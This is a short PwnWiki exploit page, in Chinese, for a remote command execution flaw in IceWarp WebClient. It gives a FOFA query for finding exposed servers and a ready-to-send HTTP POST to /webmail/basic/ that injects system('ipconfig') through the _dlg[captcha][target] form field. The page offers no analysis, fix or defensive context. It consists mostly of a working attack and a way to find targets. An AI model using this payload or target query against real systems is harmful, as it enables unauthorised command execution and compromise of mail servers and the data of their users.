IceWarp WebClient basic 远程命令执行漏洞

From PwnWiki
This page is a translated version of the page IceWarp WebClient basic 遠程命令執行漏洞 and the translation is 100% complete.
Other languages:
Chinese • ‎English • ‎中文(中国大陆)‎ • ‎中文(繁體)‎

漏洞影响

IceWarp WebClient

FOFA

app="IceWarp-公司产品"

POC

POST /webmail/basic/ HTTP/1.1
Host: x.x.x.x
Content-Type: application/x-www-form-urlencoded
Cookie: use_cookies=1
Content-Length: 43
_dlg[captcha][target]=system(\'ipconfig\')\